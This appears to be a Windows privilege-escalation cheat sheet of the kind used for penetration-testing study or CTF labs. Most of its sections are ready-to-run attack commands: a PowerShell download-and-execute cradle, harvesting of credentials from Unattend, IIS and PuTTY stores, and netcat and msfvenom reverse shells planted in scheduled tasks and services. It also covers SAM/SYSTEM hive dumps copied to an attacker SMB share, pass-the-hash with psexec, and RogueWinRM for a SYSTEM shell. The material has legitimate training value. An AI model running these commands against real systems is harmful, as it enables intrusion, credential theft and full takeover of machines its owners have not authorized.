Privilege Escalation

Fundamentals of Windows privilege escalation

Execute remote program:

powershell iex(new-object net.webclient).downloadString('http://$IP:$PORT/$FILE')

Download remote file:

powershell invoke-webrequest -uri "http://$IP/$FILE" -outfile "$FILE"

Password Harvesting

Gathering credentials is one of the quickest and easiest ways to conduct lateral or privilege escalation. Often times, plaintext credentials can be found in documents, notes, or even stored by software in configuration files.

Unattended Windows Installations

Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through a network, will sometimes store credentials in some of the following locations:

• C:\Unattend.xml

• C:\Windows\Panther\Unattend.xml

• C:\Windows\Panther\Unattend\Unattend.xml

• C:\Windows\system32\sysprep.inf

• C:\Windows\system32\sysprep\sysprep.xml

Powershell History

Like printing the bash history of a Linux machine, it's also possible to print past commands on Windows using Powershell history with the following command:

type $USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
# $USERPROFILE can be replaced with the current user of $Env:userprofile

Saved Windows Credentials

Windows allows users to use other user' credentials by saving them as a "cmdkey". They can be viewed with:

cmdkey /list

While you can't see the password, you can use runas to open a cmd shell for the user:

runas /savecred /user:$USER cmd.exe

IIS Configuration

Internet Information Services (IIS) stored credentials of websites in a file called web.config. They can be found in the following locations:

• C:\inetpub\wwwroot\web.config

• C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

An example of the command to find the database connection strings look like this:

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

PuTTY Storage Reg Key

The SSH client, PuTTY, which is commonly found on Windows systems, will sometimes store cleartext authentication credentials. To retrieve stored proxy credentials, search under the following registry key for ProxyPassword:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
# Simon Tatham is creator of PuTTY and his name is part of the path

Scheduled Tasks

Sometimes there may be scheduled tasks that have incorrect permissions and are being run by an elevated user. These tasks can be changed to execute malicious code such as a reverse shell or other persistent actions. The following is a list of commands that can be used to find potential tasks:

# Details on all scheduled services - important is "Task to Run"
schtasks /query /fo list /v

# Better scoped search
schtasks /query /fo table /nh | findstr /v /i "disable deshab"

# Lookup specific tash
schtasks /query /tn $TASKNAME /fo list /v

# Powershell commad to get non Windows tasks
PS > Get-ScheduledTask | Where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

Then the following commands can be used to investigate a suspicious task and possibly change the program if the current user has access to write to it i.e. "(F) full or (W) write or (M) modify":

# Check the file permissions of the "Task to Run"
icacls $TASKTORUN

# Echo a reverse shell to the task to run
echo nc.exe -e cmd.exe $IP $PORT > $TASKTORUN

# Run scheduled task - this will execute the reverse shell from above
schtasks /run /tn $TASK

Integrity Control Access Control List (icacls) Cheat Sheet:

• F - full access

• M - modify access

• RX - read and execute access

• R - read only

• W - write only

AlwaysInstallElevated

Windows installer files (also known as .msi files) are used to install applications on the system. They can be modified to run with higher privileges from any user account if the following two registry values are set:

• reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

• reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

To exploit this, a malicious .msi file using msfvenom can be created, transferred and run:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f msi -o malicious.msi

msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Windows Service Misconfigurations

Windows services are managed by the Service Control Manager (SCM). The SCM is in charge of managing the state of services, checking the statuses, and providing a way to configure services. Service executables implement special functions to communicate with the SCM, meaning not any executable can be started as a service successfully.

Insecure Permissions on Executable

If the executable associated with the BINARY_PATH_NAME has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account. The following commands can be used to investigate and check the permissions of services:

# Powershell command to find irregular insecure services
PS > Get-WmiObject win32_service | select Name,PathName,StartMode,StartName | where {$_.StartMode -ne "Disabled" -and $_.PathName -notmatch "`"" -and $_.PathName -notmatch "C:\\Windows"} | Format-List

# Query the service configuration
sc qc $SERVICE_NAME

# Check the permissions of the service
icacls $SERVICE_BINARY_PATH

If a vulnerable service can be modified or overwritten, then it can be overwritten with a malicious payload. The following uses msfvenom to create a service exe:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=1337 -f exe-service -o rev-svc.exe

The next step is replacing the service. This can be done by downloading and moving it into the modifiable or writable service

# Retrieve file
powershell invoke-webrequest -uri http://$IP/rev-svc.exe -outfile svc.exe

# Move files to overwrite original file with malicious service
move $ORIGINAL $ORIGINAL.bkp
move svc.exe $ORIGINAL

# Grant privilege to execute to everyone
icacls $ORIGINAL /grant Everyone:F

Now the service can be executed to send a callback to the attack machine by stopping and starting the service that calls the executable file:

sc stop $SERVICE_NAME
sc start $SERVICE_NAME

Unquoted Service Paths

If the service executable can't be directly wrote into, sometimes there can still be a chance to force a service into running arbitrary executables by using a rather obscure feature called Unquoted Service Paths, which means the path of the associated executable isn't properly quoted to account for spaces on the command. These vulnerable paths can be found by investigating with the following commands:

# Windows command to find unquoted service paths
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'

Now, say there is a path that looks like C:\MyPrograms\An Unquoted Path\service.exe. When the Service Control Manager (SCM) tries to execute the associated binary, the command becomes ambiguous due to the spaces in "An Unquoted Path", so the SCM doesn't know what to execute. The following table explains what the SCM sees when trying to execute.

Command	Argument 1	Argument 2
C:\MyPrograms\An.exe	Unquoted	Path\service.exe
C:\MyPrograms\An Unquoted.exe	Path\service.exe
C:\MyPrograms\An Unquoted Path\service.exe

This has to do with how the command prompt parses a command. Usually, when you send a command, spaces are used as argument separators unless they are part of a quoted string. This means the expected executable would be C:\MyPrograms\An.exe while the rest of the path are arguments. If that doesn't exist, it would try the next space delimited string and so forth as the table shows.

Now if any of those executables could be written to, there is now a vulnerability that allows an attacker to inject a malicious service into a valid location such as if C:\MyPrograms\ was writable by the current user. Following the same steps in Insecure Permissions on Executable would lead to another successful shell.

Insecure Service Permissions

There is also a chance to exploit a service if the service's DACL (not the executable DACL) allows modification on the configuration of a service. This can be checked with the AccessChk tool from the Sysinternals suite. This can be downloaded from the following [Accesschk](https://live.sysinternals.com/accesschk.exe).

SysInternals AccessChk Tool

Access check is a useful tool for checking the permissions of services, the following is a short command list to check for vulnerable services that can be used along side PowerShell cmdlets and scripts:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul

If the result of one of these commands has something like the following, it means any user can reconfigure the service.

[*] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
    SERVICE_ALL_ACCESS

Once again, following the steps in Insecure Permissions on Executable to generate a reverse shell as a service, the vulnerable service can be overwritten using the SCM:

# Grant executable permissions to malicious service
icacls C:\$PATH\svc.exe /grant Everyone:F

# Change the service's associated executable and account
sc config $SERVICE_NAME binPath= "C:\$PATH\svc.exe" obj= LocalSystem

# Stop and start service
sc stop $SERVICE_NAME
sc start $SERVICE_NAME

Windows Privileges

Privileges are rights that an account has to perform specific system-related tasks. These tasks can sometimes allow a user to escalate in the system. A users privileges can be checked with the following command:

whoami /priv

SeBackup / SeRestore

The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. This is supposed to allow systems to perform backups from a system without requiring full administrative privileges. One way of conducting privilege escalation is to copy the SAM and SYSTEM registry hives to extract the local Administrator's password hash.

# Backup SYSTEM hashes
reg save hklm\system C:\$PATH\system.hive

# Backup SAM hashes
reg save hklm\sam C:\$PATH\sam.hive

To transfer these files back to the attack machine, use something like Impacket's simple SMB server, smbserver.py, with a network share. The following SMB server command will create a share named public pointing to the share directory. Enter the following commands from the attack box:

# Create folder on attack box
mkdir share

# Start SMB server
smbserver.py -smb2support -username $WIN_USER -password $WIN_PASS public share

Then transfer the files from the Windows box to the attacker box:

copy C:\$PATH\sam.hive \\$ATTACKER_IP\public\
copy C:\$PATH\system.hive \\$ATTACKER_IP\public\

Next use Impacket's secretsdump.py module to retrieve the user's password hashes. At this point, the attacker can perform Pass-the-Hash to attempt to gain access to the target machine with SYSTEM privileges using Impacket's psexec.py module.

# Retrieve password hashes
secretsdump.py -sam sam.hive -system system.hive LOCAL

# Perform Pass-the-Hash attack
psexec.py -hashes $HASH $USER@$IP

SeTakeOwnership

The SeTakeOwnership privilege allows a user to take ownership of any object on a system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges. One example is to search for a service running as SYSTEM and take ownership of the service's executable.

Find any administrator owned or system owned service or application and take ownership of it using the following command:

# Take ownership with SeTakeOwnership privilege
takeown /f C:\$PATH\$EXECUTABLE

# Grant full permissions
icacls C:\$PATH\$EXECUTABLE /grant $CURR_USER:F

# Replace it with malicious executable or something like cmd.exe
copy cmd.exe C:\$PATH\$EXECUTABLE

Then it is as easy as causing the newly owned executable to execute leading the malicious executable to run or opening an administrator/system owned command prompt.

SeImpersonate / SeAssignPrimaryToken

These privilege allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or thread under the security context of another user. A very famous exploit for this is "RottenPotato" or "JuicyPotato", which leverages the privilege escalation chain based on BITS service and having the SeImpersonate privilege.

In elevate privileges in Windows systems using these privileges, an attacker needs to conduct the following:

1. Spawn a process so that users can connect and authenticate to it for impersonation to occur.

2. Find a way to force privileged users to connect and authenticate to the spawned malicious process

Although "JuicyPotato" is typically the exploit of choice for this privilege, others can be used as well such as the "RogueWinRM" or "RoguePotato" exploits. The RogueWinRm exploit is possible because whenever a user starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges. Port 5985 is typically used for the WinRM service, which is simply a port that exposes a Powershell console to be used remotely through the network much like how SSH works with Linux machines. If the WinRM service isn't running on the victim server, a fake service can be started and catch an authentication attempt from SYSTEM thus enabling RogueWinRM.

# Enter the following command to execute RogueWinRM
C:\$PATH\RogueWinRM.exe -p "C:\$PATH2\nc64.exe" -a "-e cmd.exe $ATTACKER_IP $LISTEN_PORT"

Netcat for 64 bit Windows can be found here:

https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe

RogueWinRM can be found here:

https://github.com/antonioCoco/RogueWinRM/releases/download/1.1/RogueWinRM.zip

Running the above command will result in a SYSTEM shell owned by "NT AUTHORITY\SYSTEM".

WinPEAS

WinPEAS is a script developed to enumerate the target system to uncover privilege escalation paths. It will run commands similar to all the above commands and print the collective output. The script can be downloaded from the following location:

PEASS-ng/winPEAS at master · carlospolop/PEASS-ngGitHub

To run it, call the exe and it's suggested to output it to a file for later reading:

winpeas.exe > winpeas.txt

If it doesn't print in color, enter the following command and restart the terminal:

REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1